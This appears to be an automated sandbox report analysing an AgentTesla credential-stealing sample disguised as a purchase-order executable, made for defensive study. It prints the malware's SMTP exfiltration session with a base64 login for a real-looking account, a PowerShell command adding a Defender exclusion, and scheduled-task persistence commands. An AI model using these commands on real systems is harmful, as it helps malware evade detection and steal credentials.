May 14, 2022 11:38:36.237903118 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:38:36.238543987 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
May 14, 2022 11:38:36.248081923 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:38:36.248332024 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:38:36.459332943 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:38:36.459573984 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:38:36.470254898 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 14, 2022 11:38:36.681509018 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 14, 2022 11:38:36.693423033 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:38:36.693746090 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:38:36.909193039 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:38:36.909476995 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:38:36.917265892 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3 | 250 2.1.0 Ok
May 14, 2022 11:38:36.919039965 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38 | RCPT TO:<aborderias@transmase.com>
May 14, 2022 11:38:37.132623911 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3 | 250 2.1.0 Ok
May 14, 2022 11:38:37.133021116 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38 | RCPT TO:<aborderias@transmase.com>
May 14, 2022 11:38:37.152249098 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
May 14, 2022 11:38:37.371928930 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded


Target ID: 0
Start time: 11:36:28
Start date: 14/05/2022
Path: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe"
Imagebase: 0xb30000
File size: 677888 bytes
MD5 hash: 152EF22896BF39197D210D40171E898A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 4
Start time: 11:36:42
Start date: 14/05/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe"
Imagebase: 0xf70000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 5
Start time: 11:36:42
Start date: 14/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 6
Start time: 11:36:42
Start date: 14/05/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp"
Imagebase: 0xf50000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 7
Start time: 11:36:44
Start date: 14/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 8
Start time: 11:36:45
Start date: 14/05/2022
Path: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
Imagebase: 0x2d0000
File size: 677888 bytes
MD5 hash: 152EF22896BF39197D210D40171E898A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 9
Start time: 11:36:47
Start date: 14/05/2022
Path: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
Imagebase: 0x710000
File size: 677888 bytes
MD5 hash: 152EF22896BF39197D210D40171E898A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:20
                                                Start time:11:37:06
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                                                Imagebase:0x810000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 62%, ReversingLabs
                                                Reputation:low

                                                Target ID:22
                                                Start time:11:37:14
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:23
                                                Start time:11:37:14
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                                                Imagebase:0x750000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:24
                                                Start time:11:37:15
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:25
                                                Start time:11:37:16
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Imagebase:0x9b0000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:27
                                                Start time:11:37:26
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:28
                                                Start time:11:37:26
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:29
                                                Start time:11:37:28
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Imagebase:0x820000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low


                                                  Execution Graph

                                                  Execution Coverage:12.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:60
                                                  Total number of Limit Nodes:3

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UUUU
                                                  • API String ID: 0-1798160573
                                                  • Opcode ID: 95d41813a957dc2f1bcdaca7857baad3a067eb8b1494ebb38d35edf3b58fd846
                                                  • Instruction ID: eedd0ff3fe1312a84046799d5787991eeda3e95977a16184509a3ed6425f9b53
                                                  • Opcode Fuzzy Hash: 95d41813a957dc2f1bcdaca7857baad3a067eb8b1494ebb38d35edf3b58fd846
                                                  • Instruction Fuzzy Hash: E7A2B275A04228CFDB64CF69C984B99BBB2FF89304F1581E9D509AB325DB319E81CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d1a465365b229bf79f882cc5dd5ded3c587d710fd36437b502b085242a5ef19
                                                  • Instruction ID: 37a7ab1a2c206c05a63b961266633c29b5c81eca8963262ea4fd658e2cccd5d4
                                                  • Opcode Fuzzy Hash: 1d1a465365b229bf79f882cc5dd5ded3c587d710fd36437b502b085242a5ef19
                                                  • Instruction Fuzzy Hash: A032B9B0B01205AFDB19DB69C964BAEB7F6AFC9300F144469E516DB3A0CB35ED01CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered graph not recoverable from the text dump; node list omitted. Entry 2d4bc20, one internal call to 2d4bf58 from block 2d4bccf-2d4bd06, exit blocks 2d4bf26/2d4bf2e; no Windows API resolved.)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd2ce8f4ac4b91d5cb4c151bb518644ee304b470a647a7438978903d5ad4f20d
                                                  • Instruction ID: 097f74c6bec8bfa5bea0b7251cc4b37c80827e7f83dd9e8c0cc9c735e108d9c8
                                                  • Opcode Fuzzy Hash: fd2ce8f4ac4b91d5cb4c151bb518644ee304b470a647a7438978903d5ad4f20d
                                                  • Instruction Fuzzy Hash: 8A917C34E103198FCB04DBE0D854ADEBBBABF99308F148615E516AF3A0EF70A945DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered graph not recoverable from the text dump; node list omitted. Entry 2d457e4; the first block runs up to 2d46ca1 and calls CreateActCtxA, followed by a short tail 2d46ca3-2d46d29.)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02D46C91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6f614d5629e066c26baa23c356f9fc4a140cd6b796fb28ff98b775ac7b722838
                                                  • Instruction ID: 434d857e6ae5e9745167010ef3fcdfeb32b97715803b0c2a3c3f844b3ce0ff34
                                                  • Opcode Fuzzy Hash: 6f614d5629e066c26baa23c356f9fc4a140cd6b796fb28ff98b775ac7b722838
                                                  • Instruction Fuzzy Hash: E341D2B1C04618CBDB24CFA9C984B9EBBB5FF49308F108069D509AB354DB75A985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered graph not recoverable from the text dump; node list omitted. Entry 2d46bd6; the first block runs up to 2d46ca1 and calls CreateActCtxA, followed by the same tail 2d46ca3-2d46d29 as the function above, i.e. a second entry into the same code.)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02D46C91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6ef70a94fd9c9b81d2d8632cf8fdb56a355e997afd5dce601177cc1cbdedfa7c
                                                  • Instruction ID: 98d86126a86b9d1b3706bb9949156cffc8429d4d24e4b1c2a64266a8b67d43c4
                                                  • Opcode Fuzzy Hash: 6ef70a94fd9c9b81d2d8632cf8fdb56a355e997afd5dce601177cc1cbdedfa7c
                                                  • Instruction Fuzzy Hash: B441D2B1C04618CFDB24CFA9D984BDEBBB5FF89308F208069D509AB254DB756985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered graph not recoverable from the text dump; node list omitted. Entry 2d4ded0; block 2d4df6a-2d4dfa2 calls CallWindowProcW; all paths converge on 2d4dfdf-2d4dfec.)
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 02D4DF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 7b8aace44f9ac45b4c7ef826b4c45e2aa4cf36b932a769a75da9af0fdc5c7f86
                                                  • Instruction ID: ae1efb9a26f9ae6267cdef57044b4606dba855f3ebef18d5edd786f874d80f65
                                                  • Opcode Fuzzy Hash: 7b8aace44f9ac45b4c7ef826b4c45e2aa4cf36b932a769a75da9af0fdc5c7f86
                                                  • Instruction Fuzzy Hash: 5D414AB4A00345CFCB14CF99C488B9ABBF6FF88314F258599E519AB361D774A845CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered graph not recoverable from the text dump; node list omitted. The entry block 7aaa778-7aaa7e2 calls PostMessageW and reaches 7aaa7eb-7aaa7ff either directly or via 7aaa7e4-7aaa7ea.)
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07AAA7D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 93f558d40d76b13f34c6a44b07e9ea2730aaa760ba946ddcc0449cb071baadbf
                                                  • Instruction ID: bea034601030e1a42dc71f1b17751d9b8c8c0b68641bf52e4161b77c2ad0d504
                                                  • Opcode Fuzzy Hash: 93f558d40d76b13f34c6a44b07e9ea2730aaa760ba946ddcc0449cb071baadbf
                                                  • Instruction Fuzzy Hash: 6411E5B5800349DFDB10CF99D884BDFBBF8EB48324F14881AE565A7600C375A584CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UUUU$f_%!
                                                  • API String ID: 0-131217998
                                                  • Opcode ID: 1a569f3fe2ef7596e18c6225ae817cc527643ded1fd6f78588652954d4e83a1c
                                                  • Instruction ID: 87025698aca2bc7dbf3bdfb3fae343a06a4b24292c0805d1a3e7f57963d15b7e
                                                  • Opcode Fuzzy Hash: 1a569f3fe2ef7596e18c6225ae817cc527643ded1fd6f78588652954d4e83a1c
                                                  • Instruction Fuzzy Hash: 42515D70E106299FDBA4CFA8C884B8DBBF2BF48314F5481A9D05CE7215DB749A89CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4628f075d5a92ea57e4f61066b546588c7eee7a7859ccefafa82b924dd5051f0
